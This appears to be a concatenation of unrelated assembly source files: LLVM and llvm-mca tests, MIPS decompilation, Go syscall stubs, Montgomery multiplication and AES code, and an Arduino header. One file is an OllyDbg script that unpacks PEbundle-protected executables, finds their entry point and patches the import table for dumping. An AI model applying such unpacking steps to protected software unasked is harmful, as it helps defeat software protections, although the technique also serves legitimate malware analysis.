; CHECK: Compile Unit
; CHECK-SAME: abbr_offset = 0x0043
; CHECK: DW_TAG_compile_unit
; CHECK-NOT: DW_TAG
; CHECK: DW_AT_name {{.*}} "b.cpp"
; Verify that abbreviations are decoded using the abbrev offset in the index
; CHECK: DW_TAG_structure_type
; CHECK: DW_TAG_subprogram
; CHECK-LABEL: .debug_types.dwo contents:
; CHECK: Type Unit
; CHECK: DW_TAG_type_unit
; CHECK: DW_AT_stmt_list {{.*}}(0x00000000)
; CHECK: DW_TAG_structure_type
; CHECK: DW_AT_decl_file {{.*}} ("a.cpp")
; CHECK: Type Unit
; CHECK: DW_TAG_type_unit
; CHECK: DW_AT_stmt_list {{.*}}(0x00000000)
; CHECK: DW_TAG_structure_type
; CHECK: DW_AT_decl_file {{.*}} ("b.cpp")
; CHECK: .debug_cu_index contents:
; CHECK-NEXT: version = 2 slots = 16
; CHECK: Index Signature INFO ABBREV LINE STR_OFFSETS
; CHECK-NEXT: ----- ------------------ ------------------------ ------------------------ ------------------------ ------------------------
; CHECK-NEXT: 3 0xfef104c25502f092 [0x0000002d, 0x0000005f) [0x00000043, 0x0000008e) [0x0000001a, 0x00000034) [0x00000010, 0x00000024)
; CHECK-NEXT: 9 0x03c30756e2d45008 [0x00000000, 0x0000002d) [0x00000000, 0x00000043) [0x00000000, 0x0000001a) [0x00000000, 0x00000010)
; CHECK: .debug_tu_index contents:
; CHECK-NEXT: version = 2 slots = 16
; CHECK: Index Signature TYPES ABBREV LINE STR_OFFSETS
; CHECK-NEXT: ----- ------------------ ------------------------ ------------------------ ------------------------ ------------------------
; CHECK-NEXT: 9 0x1d02f3be30cc5688 [0x00000024, 0x00000048) [0x00000043, 0x0000008e) [0x0000001a, 0x00000034) [0x00000010, 0x00000024)
; CHECK-NEXT: 13 0x3875c0e21cda63fc [0x00000000, 0x00000024) [0x00000000, 0x00000043) [0x00000000, 0x0000001a) [0x00000000, 0x00000010)
; TODO: use the index section offset info to correctly dump strings in debug info
; TODO: use the index section offset info to correctly dump file names in debug info
| {
"language": "Assembly"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -basicaa -slp-vectorizer -S -mtriple=x86_64-unknown -mcpu=corei7-avx | FileCheck %s
%struct.complex = type { float, float }
define void @foo (%struct.complex* %A, %struct.complex* %B, %struct.complex* %Result) {
; CHECK-LABEL: @foo(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[TMP0:%.*]] = add i64 256, 0
; CHECK-NEXT: br label [[LOOP:%.*]]
; CHECK: loop:
; CHECK-NEXT: [[TMP1:%.*]] = phi i64 [ 0, [[ENTRY:%.*]] ], [ [[TMP20:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP2:%.*]] = phi float [ 0.000000e+00, [[ENTRY]] ], [ [[TMP19:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP3:%.*]] = phi float [ 0.000000e+00, [[ENTRY]] ], [ [[TMP18:%.*]], [[LOOP]] ]
; CHECK-NEXT: [[TMP4:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX:%.*]], %struct.complex* [[A:%.*]], i64 [[TMP1]], i32 0
; CHECK-NEXT: [[TMP5:%.*]] = load float, float* [[TMP4]], align 4
; CHECK-NEXT: [[TMP6:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[A]], i64 [[TMP1]], i32 1
; CHECK-NEXT: [[TMP7:%.*]] = load float, float* [[TMP6]], align 4
; CHECK-NEXT: [[TMP8:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[B:%.*]], i64 [[TMP1]], i32 0
; CHECK-NEXT: [[TMP9:%.*]] = load float, float* [[TMP8]], align 4
; CHECK-NEXT: [[TMP10:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[B]], i64 [[TMP1]], i32 1
; CHECK-NEXT: [[TMP11:%.*]] = load float, float* [[TMP10]], align 4
; CHECK-NEXT: [[TMP12:%.*]] = fmul float [[TMP5]], [[TMP9]]
; CHECK-NEXT: [[TMP13:%.*]] = fmul float [[TMP7]], [[TMP11]]
; CHECK-NEXT: [[TMP14:%.*]] = fsub float [[TMP12]], [[TMP13]]
; CHECK-NEXT: [[TMP15:%.*]] = fmul float [[TMP7]], [[TMP9]]
; CHECK-NEXT: [[TMP16:%.*]] = fmul float [[TMP5]], [[TMP11]]
; CHECK-NEXT: [[TMP17:%.*]] = fadd float [[TMP15]], [[TMP16]]
; CHECK-NEXT: [[TMP18]] = fadd float [[TMP3]], [[TMP14]]
; CHECK-NEXT: [[TMP19]] = fadd float [[TMP2]], [[TMP17]]
; CHECK-NEXT: [[TMP20]] = add nuw nsw i64 [[TMP1]], 1
; CHECK-NEXT: [[TMP21:%.*]] = icmp eq i64 [[TMP20]], [[TMP0]]
; CHECK-NEXT: br i1 [[TMP21]], label [[EXIT:%.*]], label [[LOOP]]
; CHECK: exit:
; CHECK-NEXT: [[TMP22:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[RESULT:%.*]], i32 0, i32 0
; CHECK-NEXT: store float [[TMP18]], float* [[TMP22]], align 4
; CHECK-NEXT: [[TMP23:%.*]] = getelementptr inbounds [[STRUCT_COMPLEX]], %struct.complex* [[RESULT]], i32 0, i32 1
; CHECK-NEXT: store float [[TMP19]], float* [[TMP23]], align 4
; CHECK-NEXT: ret void
;
entry:
%0 = add i64 256, 0
br label %loop
loop:
%1 = phi i64 [ 0, %entry ], [ %20, %loop ]
%2 = phi float [ 0.000000e+00, %entry ], [ %19, %loop ]
%3 = phi float [ 0.000000e+00, %entry ], [ %18, %loop ]
%4 = getelementptr inbounds %"struct.complex", %"struct.complex"* %A, i64 %1, i32 0
%5 = load float, float* %4, align 4
%6 = getelementptr inbounds %"struct.complex", %"struct.complex"* %A, i64 %1, i32 1
%7 = load float, float* %6, align 4
%8 = getelementptr inbounds %"struct.complex", %"struct.complex"* %B, i64 %1, i32 0
%9 = load float, float* %8, align 4
%10 = getelementptr inbounds %"struct.complex", %"struct.complex"* %B, i64 %1, i32 1
%11 = load float, float* %10, align 4
%12 = fmul float %5, %9
%13 = fmul float %7, %11
%14 = fsub float %12, %13
%15 = fmul float %7, %9
%16 = fmul float %5, %11
%17 = fadd float %15, %16
%18 = fadd float %3, %14
%19 = fadd float %2, %17
%20 = add nuw nsw i64 %1, 1
%21 = icmp eq i64 %20, %0
br i1 %21, label %exit, label %loop
exit:
%22 = getelementptr inbounds %"struct.complex", %"struct.complex"* %Result, i32 0, i32 0
store float %18, float* %22, align 4
%23 = getelementptr inbounds %"struct.complex", %"struct.complex"* %Result, i32 0, i32 1
store float %19, float* %23, align 4
ret void
}
| {
"language": "Assembly"
} |
glabel func_80AFEF5C
/* 00CAC 80AFEF5C 27BDFFE8 */ addiu $sp, $sp, 0xFFE8 ## $sp = FFFFFFE8
/* 00CB0 80AFEF60 AFBF0014 */ sw $ra, 0x0014($sp)
/* 00CB4 80AFEF64 240E0003 */ addiu $t6, $zero, 0x0003 ## $t6 = 00000003
/* 00CB8 80AFEF68 A08E02D4 */ sb $t6, 0x02D4($a0) ## 000002D4
/* 00CBC 80AFEF6C A48002CC */ sh $zero, 0x02CC($a0) ## 000002CC
/* 00CC0 80AFEF70 AFA40018 */ sw $a0, 0x0018($sp)
/* 00CC4 80AFEF74 0C2BF8AC */ jal func_80AFE2B0
/* 00CC8 80AFEF78 24050001 */ addiu $a1, $zero, 0x0001 ## $a1 = 00000001
/* 00CCC 80AFEF7C 8FA40018 */ lw $a0, 0x0018($sp)
/* 00CD0 80AFEF80 0C2BF8CE */ jal func_80AFE338
/* 00CD4 80AFEF84 24050001 */ addiu $a1, $zero, 0x0001 ## $a1 = 00000001
/* 00CD8 80AFEF88 8FBF0014 */ lw $ra, 0x0014($sp)
/* 00CDC 80AFEF8C 27BD0018 */ addiu $sp, $sp, 0x0018 ## $sp = 00000000
/* 00CE0 80AFEF90 03E00008 */ jr $ra
/* 00CE4 80AFEF94 00000000 */ nop
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for 386, OpenBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-28
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-40
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-52
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-28
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-40
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
.text
.globl bn_mul_mont
.type bn_mul_mont,@function
.align 16
bn_mul_mont:
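# entry dispatch (informal summary): word counts not divisible by 4, or
# below 8, use the generic 1x loop; if ap == bp and the count is a
# multiple of 8 words, take the dedicated squaring path; otherwise use
# the 4x unrolled loop.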
testl $3,%r9d
jnz .Lmul_enter
cmpl $8,%r9d
jb .Lmul_enter
cmpq %rsi,%rdx
jne .Lmul4x_enter
testl $7,%r9d
jz .Lsqr8x_enter
jmp .Lmul4x_enter
.align 16
.Lmul_enter:
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r9d
leaq 2(%r9),%r10
movq %rsp,%r11
negq %r10
leaq (%rsp,%r10,8),%rsp
andq $-1024,%rsp
movq %r11,8(%rsp,%r9,8)
.Lmul_body:
movq %rdx,%r12
movq (%r8),%r8
movq (%r12),%rbx
movq (%rsi),%rax
xorq %r14,%r14
xorq %r15,%r15
movq %r8,%rbp
mulq %rbx
movq %rax,%r10
movq (%rcx),%rax
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%r13
leaq 1(%r15),%r15
jmp .L1st_enter
.align 16
.L1st:
addq %rax,%r13
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%r13
movq %r10,%r11
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
.L1st_enter:
mulq %rbx
addq %rax,%r11
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
leaq 1(%r15),%r15
movq %rdx,%r10
mulq %rbp
cmpq %r9,%r15
jne .L1st
addq %rax,%r13
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%r13
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
movq %r10,%r11
xorq %rdx,%rdx
addq %r11,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r9,8)
movq %rdx,(%rsp,%r9,8)
leaq 1(%r14),%r14
jmp .Louter
.align 16
.Louter:
movq (%r12,%r14,8),%rbx
xorq %r15,%r15
movq %r8,%rbp
movq (%rsp),%r10
mulq %rbx
addq %rax,%r10
movq (%rcx),%rax
adcq $0,%rdx
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq 8(%rsp),%r10
movq %rdx,%r13
leaq 1(%r15),%r15
jmp .Linner_enter
.align 16
.Linner:
addq %rax,%r13
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
movq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
.Linner_enter:
mulq %rbx
addq %rax,%r11
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
addq %r11,%r10
movq %rdx,%r11
adcq $0,%r11
leaq 1(%r15),%r15
mulq %rbp
cmpq %r9,%r15
jne .Linner
addq %rax,%r13
movq (%rsi),%rax
adcq $0,%rdx
addq %r10,%r13
movq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %r13,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdx,%rdx
addq %r11,%r13
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r9,8)
movq %rdx,(%rsp,%r9,8)
leaq 1(%r14),%r14
cmpq %r9,%r14
jb .Louter
xorq %r14,%r14
movq (%rsp),%rax
leaq (%rsp),%rsi
movq %r9,%r15
jmp .Lsub
.align 16
.Lsub: sbbq (%rcx,%r14,8),%rax
movq %rax,(%rdi,%r14,8)
movq 8(%rsi,%r14,8),%rax
leaq 1(%r14),%r14
decq %r15
jnz .Lsub
sbbq $0,%rax
xorq %r14,%r14
andq %rax,%rsi
notq %rax
movq %rdi,%rcx
andq %rax,%rcx
movq %r9,%r15
orq %rcx,%rsi
.align 16
.Lcopy:
movq (%rsi,%r14,8),%rax
movq %r14,(%rsp,%r14,8)
movq %rax,(%rdi,%r14,8)
leaq 1(%r14),%r14
subq $1,%r15
jnz .Lcopy
movq 8(%rsp,%r9,8),%rsi
movq $1,%rax
movq (%rsi),%r15
movq 8(%rsi),%r14
movq 16(%rsi),%r13
movq 24(%rsi),%r12
movq 32(%rsi),%rbp
movq 40(%rsi),%rbx
leaq 48(%rsi),%rsp
.Lmul_epilogue:
.byte 0xf3,0xc3
.size bn_mul_mont,.-bn_mul_mont
.type bn_mul4x_mont,@function
.align 16
bn_mul4x_mont:
.Lmul4x_enter:
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r9d
leaq 4(%r9),%r10
movq %rsp,%r11
negq %r10
leaq (%rsp,%r10,8),%rsp
andq $-1024,%rsp
movq %r11,8(%rsp,%r9,8)
.Lmul4x_body:
movq %rdi,16(%rsp,%r9,8)
movq %rdx,%r12
movq (%r8),%r8
movq (%r12),%rbx
movq (%rsi),%rax
xorq %r14,%r14
xorq %r15,%r15
movq %r8,%rbp
mulq %rbx
movq %rax,%r10
movq (%rcx),%rax
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq 16(%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
leaq 4(%r15),%r15
adcq $0,%rdx
movq %rdi,(%rsp)
movq %rdx,%r13
jmp .L1st4x
.align 16
.L1st4x:
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
mulq %rbx
addq %rax,%r10
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq 8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx,%r15,8),%rax
adcq $0,%rdx
leaq 4(%r15),%r15
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq -16(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-32(%rsp,%r15,8)
movq %rdx,%r13
cmpq %r9,%r15
jb .L1st4x
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdi,%rdi
addq %r10,%r13
adcq $0,%rdi
movq %r13,-8(%rsp,%r15,8)
movq %rdi,(%rsp,%r15,8)
leaq 1(%r14),%r14
.align 4
.Louter4x:
movq (%r12,%r14,8),%rbx
xorq %r15,%r15
movq (%rsp),%r10
movq %r8,%rbp
mulq %rbx
addq %rax,%r10
movq (%rcx),%rax
adcq $0,%rdx
imulq %r10,%rbp
movq %rdx,%r11
mulq %rbp
addq %rax,%r10
movq 8(%rsi),%rax
adcq $0,%rdx
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx),%rax
adcq $0,%rdx
addq 8(%rsp),%r11
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq 16(%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
leaq 4(%r15),%r15
adcq $0,%rdx
movq %rdi,(%rsp)
movq %rdx,%r13
jmp .Linner4x
.align 16
.Linner4x:
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -16(%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -8(%rsp,%r15,8),%r11
adcq $0,%rdx
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
mulq %rbx
addq %rax,%r10
movq (%rcx,%r15,8),%rax
adcq $0,%rdx
addq (%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq 8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-8(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq 8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq 8(%rsp,%r15,8),%r11
adcq $0,%rdx
leaq 4(%r15),%r15
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq -16(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-32(%rsp,%r15,8)
movq %rdx,%r13
cmpq %r9,%r15
jb .Linner4x
mulq %rbx
addq %rax,%r10
movq -16(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -16(%rsp,%r15,8),%r10
adcq $0,%rdx
movq %rdx,%r11
mulq %rbp
addq %rax,%r13
movq -8(%rsi,%r15,8),%rax
adcq $0,%rdx
addq %r10,%r13
adcq $0,%rdx
movq %r13,-24(%rsp,%r15,8)
movq %rdx,%rdi
mulq %rbx
addq %rax,%r11
movq -8(%rcx,%r15,8),%rax
adcq $0,%rdx
addq -8(%rsp,%r15,8),%r11
adcq $0,%rdx
leaq 1(%r14),%r14
movq %rdx,%r10
mulq %rbp
addq %rax,%rdi
movq (%rsi),%rax
adcq $0,%rdx
addq %r11,%rdi
adcq $0,%rdx
movq %rdi,-16(%rsp,%r15,8)
movq %rdx,%r13
xorq %rdi,%rdi
addq %r10,%r13
adcq $0,%rdi
addq (%rsp,%r9,8),%r13
adcq $0,%rdi
movq %r13,-8(%rsp,%r15,8)
movq %rdi,(%rsp,%r15,8)
cmpq %r9,%r14
jb .Louter4x
movq 16(%rsp,%r9,8),%rdi
movq 0(%rsp),%rax
pxor %xmm0,%xmm0
movq 8(%rsp),%rdx
shrq $2,%r9
leaq (%rsp),%rsi
xorq %r14,%r14
subq 0(%rcx),%rax
movq 16(%rsi),%rbx
movq 24(%rsi),%rbp
sbbq 8(%rcx),%rdx
leaq -1(%r9),%r15
jmp .Lsub4x
.align 16
.Lsub4x:
movq %rax,0(%rdi,%r14,8)
movq %rdx,8(%rdi,%r14,8)
sbbq 16(%rcx,%r14,8),%rbx
movq 32(%rsi,%r14,8),%rax
movq 40(%rsi,%r14,8),%rdx
sbbq 24(%rcx,%r14,8),%rbp
movq %rbx,16(%rdi,%r14,8)
movq %rbp,24(%rdi,%r14,8)
sbbq 32(%rcx,%r14,8),%rax
movq 48(%rsi,%r14,8),%rbx
movq 56(%rsi,%r14,8),%rbp
sbbq 40(%rcx,%r14,8),%rdx
leaq 4(%r14),%r14
decq %r15
jnz .Lsub4x
movq %rax,0(%rdi,%r14,8)
movq 32(%rsi,%r14,8),%rax
sbbq 16(%rcx,%r14,8),%rbx
movq %rdx,8(%rdi,%r14,8)
sbbq 24(%rcx,%r14,8),%rbp
movq %rbx,16(%rdi,%r14,8)
sbbq $0,%rax
movq %rbp,24(%rdi,%r14,8)
xorq %r14,%r14
andq %rax,%rsi
notq %rax
movq %rdi,%rcx
andq %rax,%rcx
leaq -1(%r9),%r15
orq %rcx,%rsi
movdqu (%rsi),%xmm1
movdqa %xmm0,(%rsp)
movdqu %xmm1,(%rdi)
jmp .Lcopy4x
.align 16
.Lcopy4x:
movdqu 16(%rsi,%r14,1),%xmm2
movdqu 32(%rsi,%r14,1),%xmm1
movdqa %xmm0,16(%rsp,%r14,1)
movdqu %xmm2,16(%rdi,%r14,1)
movdqa %xmm0,32(%rsp,%r14,1)
movdqu %xmm1,32(%rdi,%r14,1)
leaq 32(%r14),%r14
decq %r15
jnz .Lcopy4x
shlq $2,%r9
movdqu 16(%rsi,%r14,1),%xmm2
movdqa %xmm0,16(%rsp,%r14,1)
movdqu %xmm2,16(%rdi,%r14,1)
movq 8(%rsp,%r9,8),%rsi
movq $1,%rax
movq (%rsi),%r15
movq 8(%rsi),%r14
movq 16(%rsi),%r13
movq 24(%rsi),%r12
movq 32(%rsi),%rbp
movq 40(%rsi),%rbx
leaq 48(%rsi),%rsp
.Lmul4x_epilogue:
.byte 0xf3,0xc3
.size bn_mul4x_mont,.-bn_mul4x_mont
.type bn_sqr8x_mont,@function
.align 32
bn_sqr8x_mont:
.Lsqr8x_enter:
movq %rsp,%rax
pushq %rbx
pushq %rbp
pushq %r12
pushq %r13
pushq %r14
pushq %r15
movl %r9d,%r10d
shll $3,%r9d
shlq $3+2,%r10
negq %r9
leaq -64(%rsp,%r9,4),%r11
movq (%r8),%r8
subq %rsi,%r11
andq $4095,%r11
cmpq %r11,%r10
jb .Lsqr8x_sp_alt
subq %r11,%rsp
leaq -64(%rsp,%r9,4),%rsp
jmp .Lsqr8x_sp_done
.align 32
.Lsqr8x_sp_alt:
leaq 4096-64(,%r9,4),%r10
leaq -64(%rsp,%r9,4),%rsp
subq %r10,%r11
movq $0,%r10
cmovcq %r10,%r11
subq %r11,%rsp
.Lsqr8x_sp_done:
andq $-64,%rsp
movq %r9,%r10
negq %r9
leaq 64(%rsp,%r9,2),%r11
movq %r8,32(%rsp)
movq %rax,40(%rsp)
.Lsqr8x_body:
movq %r9,%rbp
.byte 102,73,15,110,211
shrq $3+2,%rbp
movl OPENSSL_ia32cap_P+8(%rip),%eax
jmp .Lsqr8x_copy_n
.align 32
.Lsqr8x_copy_n:
movq 0(%rcx),%xmm0
movq 8(%rcx),%xmm1
movq 16(%rcx),%xmm3
movq 24(%rcx),%xmm4
leaq 32(%rcx),%rcx
movdqa %xmm0,0(%r11)
movdqa %xmm1,16(%r11)
movdqa %xmm3,32(%r11)
movdqa %xmm4,48(%r11)
leaq 64(%r11),%r11
decq %rbp
jnz .Lsqr8x_copy_n
pxor %xmm0,%xmm0
.byte 102,72,15,110,207
.byte 102,73,15,110,218
call bn_sqr8x_internal
pxor %xmm0,%xmm0
leaq 48(%rsp),%rax
leaq 64(%rsp,%r9,2),%rdx
shrq $3+2,%r9
movq 40(%rsp),%rsi
jmp .Lsqr8x_zero
.align 32
.Lsqr8x_zero:
movdqa %xmm0,0(%rax)
movdqa %xmm0,16(%rax)
movdqa %xmm0,32(%rax)
movdqa %xmm0,48(%rax)
leaq 64(%rax),%rax
movdqa %xmm0,0(%rdx)
movdqa %xmm0,16(%rdx)
movdqa %xmm0,32(%rdx)
movdqa %xmm0,48(%rdx)
leaq 64(%rdx),%rdx
decq %r9
jnz .Lsqr8x_zero
movq $1,%rax
movq -48(%rsi),%r15
movq -40(%rsi),%r14
movq -32(%rsi),%r13
movq -24(%rsi),%r12
movq -16(%rsi),%rbp
movq -8(%rsi),%rbx
leaq (%rsi),%rsp
.Lsqr8x_epilogue:
.byte 0xf3,0xc3
.size bn_sqr8x_mont,.-bn_sqr8x_mont
.byte 77,111,110,116,103,111,109,101,114,121,32,77,117,108,116,105,112,108,105,99,97,116,105,111,110,32,102,111,114,32,120,56,54,95,54,52,44,32,67,82,89,80,84,79,71,65,77,83,32,98,121,32,60,97,112,112,114,111,64,111,112,101,110,115,115,108,46,111,114,103,62,0
.align 16
| {
"language": "Assembly"
} |
/*
Copyright (c) 2016 Arduino LLC. All right reserved.
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
// including Client.h is deprecated, for all future projects use Arduino.h instead
// This include is added for compatibility, it will be remove on the next
// major release of the API
#include "../Client.h"
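// Example for new code (per the note above):
//   #include <Arduino.h>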
| {
"language": "Assembly"
} |
// PEbundle V2.3 OEP finder + patch IAT // not reliable when the target is packed with more than two shell layers
// by Mr.David
// www.chinadfcg.com
var addr2
findop eip,#60# // signature instruction
mov addr2,$RESULT
bp addr2
run
BC addr2
sto
mov addr2,esp
bphws addr2,"r"
var addr1
gpa "GetModuleHandleA","kernel32.dll"
mov addr1,$RESULT // shortcut: API breakpoint on GetModuleHandleA
bp addr1
run
bc addr1 //Clear break point // remove the breakpoint
rtu //Alt+F9
findop eip,#85C0# // signature instruction
mov addr1,$RESULT
bp addr1
run
BC addr1
findop eip,#85C0# // signature instruction
mov addr1,$RESULT
bp addr1
run
BC addr1
repl eip, #85C0#, #33C0#, 2 // repair the IAT
run
bphwc addr2
sto
sto
sto
cmt eip,"OEP1 or next shell layer reached, please dump it. Enjoy!"
| {
"language": "Assembly"
} |
C arm/fat/aes-encrypt-internal-2.asm
ifelse(<
Copyright (C) 2015 Niels Möller
This file is part of GNU Nettle.
GNU Nettle is free software: you can redistribute it and/or
modify it under the terms of either:
* the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your
option) any later version.
or
* the GNU General Public License as published by the Free
Software Foundation; either version 2 of the License, or (at your
option) any later version.
or both in parallel, as here.
GNU Nettle is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received copies of the GNU General Public License and
the GNU Lesser General Public License along with this program. If
not, see http://www.gnu.org/licenses/.
>)
define(<fat_transform>, <$1_armv6>)
include_src(<arm/v6/aes-encrypt-internal.asm>)
| {
"language": "Assembly"
} |
# NOTE: Assertions have been autogenerated by utils/update_mca_test_checks.py
# RUN: llvm-mca -mtriple=x86_64-unknown-unknown -mcpu=atom -instruction-tables < %s | FileCheck %s
pabsb %mm0, %mm2
pabsb (%rax), %mm2
pabsb %xmm0, %xmm2
pabsb (%rax), %xmm2
pabsd %mm0, %mm2
pabsd (%rax), %mm2
pabsd %xmm0, %xmm2
pabsd (%rax), %xmm2
pabsw %mm0, %mm2
pabsw (%rax), %mm2
pabsw %xmm0, %xmm2
pabsw (%rax), %xmm2
palignr $1, %mm0, %mm2
palignr $1, (%rax), %mm2
palignr $1, %xmm0, %xmm2
palignr $1, (%rax), %xmm2
phaddd %mm0, %mm2
phaddd (%rax), %mm2
phaddd %xmm0, %xmm2
phaddd (%rax), %xmm2
phaddsw %mm0, %mm2
phaddsw (%rax), %mm2
phaddsw %xmm0, %xmm2
phaddsw (%rax), %xmm2
phaddw %mm0, %mm2
phaddw (%rax), %mm2
phaddw %xmm0, %xmm2
phaddw (%rax), %xmm2
phsubd %mm0, %mm2
phsubd (%rax), %mm2
phsubd %xmm0, %xmm2
phsubd (%rax), %xmm2
phsubsw %mm0, %mm2
phsubsw (%rax), %mm2
phsubsw %xmm0, %xmm2
phsubsw (%rax), %xmm2
phsubw %mm0, %mm2
phsubw (%rax), %mm2
phsubw %xmm0, %xmm2
phsubw (%rax), %xmm2
pmaddubsw %mm0, %mm2
pmaddubsw (%rax), %mm2
pmaddubsw %xmm0, %xmm2
pmaddubsw (%rax), %xmm2
pmulhrsw %mm0, %mm2
pmulhrsw (%rax), %mm2
pmulhrsw %xmm0, %xmm2
pmulhrsw (%rax), %xmm2
pshufb %mm0, %mm2
pshufb (%rax), %mm2
pshufb %xmm0, %xmm2
pshufb (%rax), %xmm2
psignb %mm0, %mm2
psignb (%rax), %mm2
psignb %xmm0, %xmm2
psignb (%rax), %xmm2
